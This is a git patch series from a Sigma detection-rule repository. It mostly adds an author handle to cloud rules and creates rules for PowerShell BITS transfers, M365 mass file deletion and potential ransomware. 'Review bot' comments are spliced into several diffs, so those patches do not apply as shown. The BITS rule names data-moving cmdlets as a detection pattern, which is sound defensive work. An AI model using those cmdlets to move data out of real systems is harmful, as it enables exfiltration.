4720 - - 4732 - condition: selection \ No newline at end of file From 9a83836070b71349858d6bf05541d81e120eb9b2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 21:00:36 -0500 Subject: [PATCH 0455/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index 342d5744..a5885858 100644 
--- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/16 references: From 842ade16be5a553acdb95b7f466a2b28d8ba5ca2 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Fri, 20 Aug 2021 02:09:31 +0000 Subject: [PATCH 0456/1367] Forgot to add my username to some of the rules. --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- rules/cloud/aws/aws_elasticache_security_group_created.yml | 2 +- .../aws_elasticache_security_group_modified_or_deleted.yml | 2 +- .../aws/aws_route_53_domain_transferred_lock_disabled.yml | 2 +- .../aws_route_53_domain_transferred_to_another_account.yml | 2 +- rules/cloud/aws/aws_s3_data_management_tampering.yml | 2 +- rules/cloud/aws/aws_sts_assumedrole_misuse.yml | 2 +- rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml | 2 +- .../azure/azure_container_registry_created_or_deleted.yml | 2 +- rules/cloud/azure/azure_firewall_modified_or_deleted.yml | 2 +- .../azure_firewall_rule_collection_modified_or_deleted.yml | 2 +- rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml | 2 +- rules/cloud/azure/azure_keyvault_modified_or_deleted.yml | 2 +- .../azure/azure_keyvault_secrets_modified_or_deleted.yml | 2 +- .../azure/azure_kubernetes_cluster_created_or_deleted.yml | 2 +- rules/cloud/azure/azure_kubernetes_events_deleted.yml | 2 +- rules/cloud/azure/azure_kubernetes_pods_deleted.yml | 4 ++-- rules/cloud/azure/azure_kubernetes_role_access.yml | 2 +- .../azure_kubernetes_rolebinding_modified_or_deleted.yml | 2 +- .../azure_kubernetes_service_account_modified_or_deleted.yml | 2 +- .../azure/azure_network_firewall_rule_modified_or_deleted.yml | 2 +- .../cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml | 2 +- .../azure_network_virtual_device_modified_or_deleted.yml | 2 +- rules/cloud/gcp/gcp_bucket_enumeration.yml | 2 +- rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml | 2 +- rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml | 2 +- rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml | 2 +- rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml | 2 +- rules/cloud/gcp/gcp_service_account_modified.yml | 2 +- 
rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml | 2 +- rules/cloud/m365/microsoft365_impossible_travel_activity.yml | 2 +- 31 files changed, 32 insertions(+), 32 deletions(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index 342d5744..a5885858 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/16 references: diff --git a/rules/cloud/aws/aws_elasticache_security_group_created.yml b/rules/cloud/aws/aws_elasticache_security_group_created.yml index 5aec929c..4ee73e1a 100644 --- a/rules/cloud/aws/aws_elasticache_security_group_created.yml +++ b/rules/cloud/aws/aws_elasticache_security_group_created.yml @@ -1,7 +1,7 @@ title: AWS ElastiCache Security Group Created id: 4ae68615-866f-4304-b24b-ba048dfa5ca7 description: Detects when an ElastiCache security group has been created. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/07/24 modified: 2021/08/19 diff --git a/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml b/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml index 162b7998..f5bbe106 100644 --- a/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS ElastiCache Security Group Modified or Deleted id: 7c797da2-9cf2-4523-ba64-33b06339f0cc description: Identifies when an ElastiCache security group has been modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/07/24 modified: 2021/08/19 
diff --git a/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml index f979bfea..0b43a509 100644 --- a/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml +++ b/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml @@ -1,7 +1,7 @@ title: AWS Route 53 Domain Transfer Lock Disabled id: 3940b5f1-3f46-44aa-b746-ebe615b879e0 description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. -author: Elastic, Austin Songer +author: Elastic, Austin Songer @austinsonger status: experimental date: 2021/07/22 references: diff --git a/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml index d5ec0275..80aec16d 100644 --- a/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml +++ b/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml @@ -1,7 +1,7 @@ title: AWS Route 53 Domain Transferred to Another Account id: b056de1a-6e6e-4e40-a67e-97c9808cf41b description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. -author: Elastic, Austin Songer +author: Elastic, Austin Songer @austinsonger status: experimental date: 2021/07/22 references: diff --git a/rules/cloud/aws/aws_s3_data_management_tampering.yml b/rules/cloud/aws/aws_s3_data_management_tampering.yml index 7e5229d1..1670c6b6 100644 --- a/rules/cloud/aws/aws_s3_data_management_tampering.yml +++ b/rules/cloud/aws/aws_s3_data_management_tampering.yml 
@@ -1,7 +1,7 @@ title: AWS S3 Data Management Tampering id: 78b3756a-7804-4ef7-8555-7b9024a02e2d description: Detects when a user tampers with S3 data management in Amazon Web Services. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/07/24 modified: 2021/08/19 diff --git a/rules/cloud/aws/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws/aws_sts_assumedrole_misuse.yml index 98906891..2e9d22f4 100644 --- a/rules/cloud/aws/aws_sts_assumedrole_misuse.yml +++ b/rules/cloud/aws/aws_sts_assumedrole_misuse.yml @@ -1,7 +1,7 @@ title: AWS STS AssumedRole Misuse id: 905d389b-b853-46d0-9d3d-dea0d3a3cd49 description: Identifies the suspicious use of AssumedRole. Attackers could move laterally and escalate privileges. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/07/24 references: diff --git a/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml b/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml index 71ec2267..d94ae3b9 100644 --- a/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml +++ b/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml @@ -1,7 +1,7 @@ title: AWS STS GetSessionToken Misuse id: b45ab1d2-712f-4f01-a751-df3826969807 description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/07/24 references: diff --git a/rules/cloud/azure/azure_container_registry_created_or_deleted.yml b/rules/cloud/azure/azure_container_registry_created_or_deleted.yml index 661b25dc..a05829ea 100644 --- a/rules/cloud/azure/azure_container_registry_created_or_deleted.yml +++ b/rules/cloud/azure/azure_container_registry_created_or_deleted.yml 
@@ -1,7 +1,7 @@ title: Azure Container Registry Created or Deleted id: 93e0ef48-37c8-49ed-a02c-038aab23628e description: Detects when a Container Registry is created or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/07 references: diff --git a/rules/cloud/azure/azure_firewall_modified_or_deleted.yml b/rules/cloud/azure/azure_firewall_modified_or_deleted.yml index d37781a6..40d0864a 100644 --- a/rules/cloud/azure/azure_firewall_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_firewall_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Firewall Modified or Deleted id: 512cf937-ea9b-4332-939c-4c2c94baadcd description: Identifies when a firewall is created, modified, or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: diff --git a/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml b/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml index 6fb67edb..15799e9d 100644 --- a/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Firewall Rule Collection Modified or Deleted id: 025c9fe7-db72-49f9-af0d-31341dd7dd57 description: Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: diff --git a/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml index 06ece7f9..db6a8128 100644 --- a/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml 
@@ -1,7 +1,7 @@ title: Azure Keyvault Key Modified or Deleted id: 80eeab92-0979-4152-942d-96749e11df40 description: Identifies when a Keyvault Key is modified or deleted in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/16 references: diff --git a/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml index f019e0d4..993ed2fc 100644 --- a/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Key Vault Modified or Deleted. id: 459a2970-bb84-4e6a-a32e-ff0fbd99448d description: Identifies when a key vault is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/16 references: diff --git a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml index f4f146af..2ae7d373 100644 --- a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Keyvault Secrets Modified or Deleted id: b831353c-1971-477b-abb6-2828edc3bca1 description: Identifies when secrets are modified or deleted in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/16 references: diff --git a/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml b/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml index 401ddb65..bf150b5a 100644 --- a/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml +++ b/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml 
@@ -1,7 +1,7 @@ title: Azure Kubernetes Cluster Created or Deleted id: 9541f321-7cba-4b43-80fc-fbd1fb922808 description: Detects when a Azure Kubernetes Cluster is created or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/07 references: diff --git a/rules/cloud/azure/azure_kubernetes_events_deleted.yml b/rules/cloud/azure/azure_kubernetes_events_deleted.yml index b84ac76a..4a080c28 100644 --- a/rules/cloud/azure/azure_kubernetes_events_deleted.yml +++ b/rules/cloud/azure/azure_kubernetes_events_deleted.yml @@ -1,7 +1,7 @@ title: Azure Kubernetes Events Deleted id: 225d8b09-e714-479c-a0e4-55e6f29adf35 description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/07/24 references: diff --git a/rules/cloud/azure/azure_kubernetes_pods_deleted.yml b/rules/cloud/azure/azure_kubernetes_pods_deleted.yml index 53ea882c..0e89293e 100644 --- a/rules/cloud/azure/azure_kubernetes_pods_deleted.yml +++ b/rules/cloud/azure/azure_kubernetes_pods_deleted.yml @@ -1,8 +1,8 @@ title: Azure Kubernetes Pods Deleted id: b02f9591-12c3-4965-986a-88028629b2e1 description: Identifies the deletion of Azure Kubernetes Pods. -author: Austin Songer -status: experimental +author: Austin Songer +status: experimental @austinsonger date: 2021/07/24 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes diff --git a/rules/cloud/azure/azure_kubernetes_role_access.yml b/rules/cloud/azure/azure_kubernetes_role_access.yml index 74b5c4ae..39b14ad8 100644 --- a/rules/cloud/azure/azure_kubernetes_role_access.yml +++ b/rules/cloud/azure/azure_kubernetes_role_access.yml 
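Review bot: In the azure_kubernetes_pods_deleted.yml hunk the handle landed on the wrong line: `+status: experimental @austinsonger` gives `status` a value outside the allowed set while `+author: Austin Songer` stays without the handle, so the rule will most likely fail the repository's status check. The intended lines are `author: Austin Songer @austinsonger` and `status: experimental`, matching every other file in this commit.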
@@ -1,7 +1,7 @@ title: Azure Kubernetes Sensitive Role Access id: 818fee0c-e0ec-4e45-824e-83e4817b0887 description: Identifies when ClusterRoles/Roles are being modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/07 references: diff --git a/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml b/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml index 8ab5492e..6e5b955a 100644 --- a/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted id: 25cb259b-bbdc-4b87-98b7-90d7c72f8743 description: Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/07 references: diff --git a/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml index 891bb4c1..f9c3cd77 100644 --- a/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Kubernetes Service Account Modified or Deleted id: 12d027c3-b48c-4d9d-8bb6-a732200034b2 description: Identifies when a service account is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/07 references: diff --git a/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml b/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml index af6398a9..e9eb00af 100644 --- a/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml 
@@ -1,7 +1,7 @@ title: Azure Firewall Rule Configuration Modified or Deleted id: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067 description: Identifies when a Firewall Rule Configuration is Modified or Deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: diff --git a/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml b/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml index bea054aa..19e762ff 100644 --- a/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Point-to-site VPN Modified or Deleted id: d9557b75-267b-4b43-922f-a775e2d1f792 description: Identifies when a Point-to-site VPN is Modified or Deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: diff --git a/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml b/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml index fc3643fc..60d39103 100644 --- a/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Virtual Network Device Modified or Deleted id: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3 description: Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: diff --git a/rules/cloud/gcp/gcp_bucket_enumeration.yml b/rules/cloud/gcp/gcp_bucket_enumeration.yml index 9c075bfc..4449bb15 100644 --- a/rules/cloud/gcp/gcp_bucket_enumeration.yml +++ b/rules/cloud/gcp/gcp_bucket_enumeration.yml 
@@ -1,7 +1,7 @@ title: Google Cloud Storage Buckets Enumeration id: e2feb918-4e77-4608-9697-990a1aaf74c3 description: Detects when storage bucket is enumerated in Google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/14 references: diff --git a/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml b/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml index 416e38ab..13904bb8 100644 --- a/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Google Cloud Storage Buckets Modified or Deleted id: 4d9f2ee2-c903-48ab-b9c1-8c0f474913d0 description: Detects when storage bucket is modified or deleted in Google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/14 references: diff --git a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml index da19b154..016a6bcb 100644 --- a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Google Cloud Firewall Modified or Deleted id: fe513c69-734c-4d4a-8548-ac5f609be82b description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/13 references: diff --git a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml index 3c4b43c1..b2b9e0ef 100644 --- a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml +++ b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml 
@@ -1,7 +1,7 @@ title: Google Full Network Traffic Packet Capture id: 980a7598-1e7f-4962-9372-2d754c930d0e description: Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/13 references: diff --git a/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml b/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml index dcc886d4..447fd4db 100644 --- a/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml +++ b/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml @@ -1,7 +1,7 @@ title: Google Cloud Service Account Disabled or Deleted id: 13f81a90-a69c-4fab-8f07-b5bb55416a9f description: Identifies when a service account is disabled or deleted in Google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/14 references: diff --git a/rules/cloud/gcp/gcp_service_account_modified.yml b/rules/cloud/gcp/gcp_service_account_modified.yml index 9b3deb2b..f7dca8d8 100644 --- a/rules/cloud/gcp/gcp_service_account_modified.yml +++ b/rules/cloud/gcp/gcp_service_account_modified.yml @@ -1,7 +1,7 @@ title: Google Cloud Service Account Modified id: 6b67c12e-5e40-47c6-b3b0-1e6b571184cc description: Identifies when a service account is modified in Google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/14 references: diff --git a/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml b/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml index 9c2e9c01..65dfd616 100644 --- a/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml 
@@ -1,7 +1,7 @@ title: Google Cloud VPN Tunnel Modified or Deleted id: 99980a85-3a61-43d3-ac0f-b68d6b4797b1 description: Identifies when a VPN Tunnel Modified or Deleted in Google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/16 references: diff --git a/rules/cloud/m365/microsoft365_impossible_travel_activity.yml b/rules/cloud/m365/microsoft365_impossible_travel_activity.yml index 19044165..3b2a14eb 100644 --- a/rules/cloud/m365/microsoft365_impossible_travel_activity.yml +++ b/rules/cloud/m365/microsoft365_impossible_travel_activity.yml @@ -2,7 +2,7 @@ title: Microsoft 365 - Impossible Travel Activity id: d7eab125-5f94-43df-8710-795b80fa1189 status: experimental description: Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel. -author: austinsonger +author: austinsonger @austinsonger date: 2020/07/06 modified: 2020/07/06 references: From 0a3e57cc12d88d4c97875cb5e0fb184c0b46f53f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 02:10:32 +0000 Subject: [PATCH 0457/1367] Update --- rules/cloud/m365/microsoft365_impossible_travel_activity.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_impossible_travel_activity.yml b/rules/cloud/m365/microsoft365_impossible_travel_activity.yml index 3b2a14eb..68146567 100644 --- a/rules/cloud/m365/microsoft365_impossible_travel_activity.yml +++ b/rules/cloud/m365/microsoft365_impossible_travel_activity.yml @@ -2,7 +2,7 @@ title: Microsoft 365 - Impossible Travel Activity id: d7eab125-5f94-43df-8710-795b80fa1189 status: experimental description: Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel. -author: austinsonger @austinsonger +author: Austin Songer @austinsonger date: 2020/07/06 modified: 2020/07/06 references: 
From 8d57ae5ffd338ed0942fc48673f55b3f2205461e Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Thu, 19 Aug 2021 21:57:37 -0500
Subject: [PATCH 0458/1367] Create win_susp_bitstransfer.yml
---
 .../win_susp_bitstransfer.yml | 32 +++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 rules/windows/process_creation/win_susp_bitstransfer.yml
diff --git a/rules/windows/process_creation/win_susp_bitstransfer.yml b/rules/windows/process_creation/win_susp_bitstransfer.yml
new file mode 100644
index 00000000..d385b238
--- /dev/null
+++ b/rules/windows/process_creation/win_susp_bitstransfer.yml
@@ -0,0 +1,32 @@
+title: Suspicious Bitstransfer via PowerShell
+id: cd5c8085-4070-4e22-908d-a5b3342deb74
+status: experimental
+description: Detects transferring files from system on a server bitstransfer Powershell cmdlets
+references:
+ - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps
+tags:
+ - attack.exfiltration
+ - attack.persistence
+ - attack.t1197
+date: 2021/08/19
+author:
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ Image|endswith:
+ - '\powershell.exe'
+ - '\powershell_ise.exe'
+ - '\pwsh.exe'
+ CommandLine|contains:
+ - 'Get-BitsTransfer'
+ - 'Add-BitsFile'
+ condition: selection
+fields:
+ - ComputerName
+ - User
+ - CommandLine
+falsepositives:
+ - Unknown
+level: medium
From 810aae5ddd2b85e9527574b36a4cec5205fac64e Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Thu, 19 Aug 2021 21:58:36 -0500
Subject: [PATCH 0459/1367] Update aws_eks_cluster_created_or_deleted.yml
---
 rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml
index a5885858..342d5744 100644
--- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml
+++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml
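Review bot: The tags on the new win_susp_bitstransfer.yml rule do not match the technique they cite: T1197 (BITS Jobs) is catalogued under defense evasion and persistence, so `attack.exfiltration` should be `attack.defense_evasion` alongside the existing `attack.persistence`. The description is garbled; `description: Detects the use of the BitsTransfer PowerShell cmdlets to move files through BITS jobs` says what the selection actually matches. On the detection side, `Get-BitsTransfer` only lists existing jobs and so adds noise rather than signal, while the cmdlet that actually moves data, `Start-BitsTransfer`, is missing from `CommandLine|contains`. `author:` is also left empty, which yields a null field.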
@@ -1,7 +1,7 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer @austinsonger +author: Austin Songer status: experimental date: 2021/08/16 references: From fe0e1353e035c3c26f5c074e93eeb05453db13e1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 22:24:23 -0500 Subject: [PATCH 0460/1367] Update win_susp_bitstransfer.yml --- rules/windows/process_creation/win_susp_bitstransfer.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_bitstransfer.yml b/rules/windows/process_creation/win_susp_bitstransfer.yml index d385b238..d64eb044 100644 --- a/rules/windows/process_creation/win_susp_bitstransfer.yml +++ b/rules/windows/process_creation/win_susp_bitstransfer.yml @@ -9,7 +9,7 @@ tags: - attack.persistence - attack.t1197 date: 2021/08/19 -author: +author: Austin Songer @austinsonger logsource: category: process_creation product: windows From 99fbd4ef44d7ea9d6fabb12cfb4181f6089d9fb2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 23:00:23 -0500 Subject: [PATCH 0461/1367] Create microsoft365_unusual_volume_of_file_deletion.yml --- ...oft365_unusual_volume_of_file_deletion.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml diff --git a/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml b/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml new file mode 100644 index 00000000..82cea96d --- /dev/null +++ b/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml 
@@ -0,0 +1,24 @@
+title: Microsoft 365 - Unusual Volume of File Deletion
+id: 78a34b67-3c39-4886-8fb4-61c46dc18ecd
+status: experimental
+description: Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.
+author: austinsonger
+date: 2021/08/19
+references:
+ - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy
+ - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference
+logsource:
+ category: ThreatManagement
+ service: Office365
+detection:
+ selection:
+ eventSource: SecurityComplianceCenter
+ eventName: "Unusual volume of file deletion"
+ status: success
+ condition: selection
+falsepositives:
+ -
+level: medium
+tags:
+ - attack.impact
+ - attack.t1485
From 9b19190ea761698b02e19eaffd13419e1996da75 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Thu, 19 Aug 2021 23:05:05 -0500
Subject: [PATCH 0462/1367] Create microsoft365_potential_ransomware_activity.yml
---
 ...osoft365_potential_ransomware_activity.yml | 24 +++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 rules/cloud/m365/microsoft365_potential_ransomware_activity.yml
diff --git a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml
new file mode 100644
index 00000000..213f0ee5
--- /dev/null
+++ b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml
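Review bot: `falsepositives:` in the new microsoft365_unusual_volume_of_file_deletion.yml holds a single bare `-`, which YAML parses as a null list entry rather than text and which the repository's rule checks will most likely reject; the same empty entry is in the microsoft365_potential_ransomware_activity.yml and microsoft365_user_restricted_from_sending_email.yml hunks that follow. Use `  - Unknown` or name the benign triggers (bulk clean-ups, migrations). The description also needs a pass: `description: Detects when Microsoft Cloud App Security reports that a user has deleted an unusually large volume of files.` Finally, `author: austinsonger` departs from the `Austin Songer @austinsonger` form the preceding commit applied across the other cloud rules.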
@@ -0,0 +1,24 @@
+title: Microsoft 365 - Potential ransomware activity
+id: bd132164-884a-48f1-aa2d-c6d646b04c69
+status: experimental
+description: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.
+author: austinsonger
+date: 2021/08/19
+references:
+ - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy
+ - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference
+logsource:
+ category: ThreatManagement
+ service: Office365
+detection:
+ selection:
+ eventSource: SecurityComplianceCenter
+ eventName: "Potential ransomware activity"
+ status: success
+ condition: selection
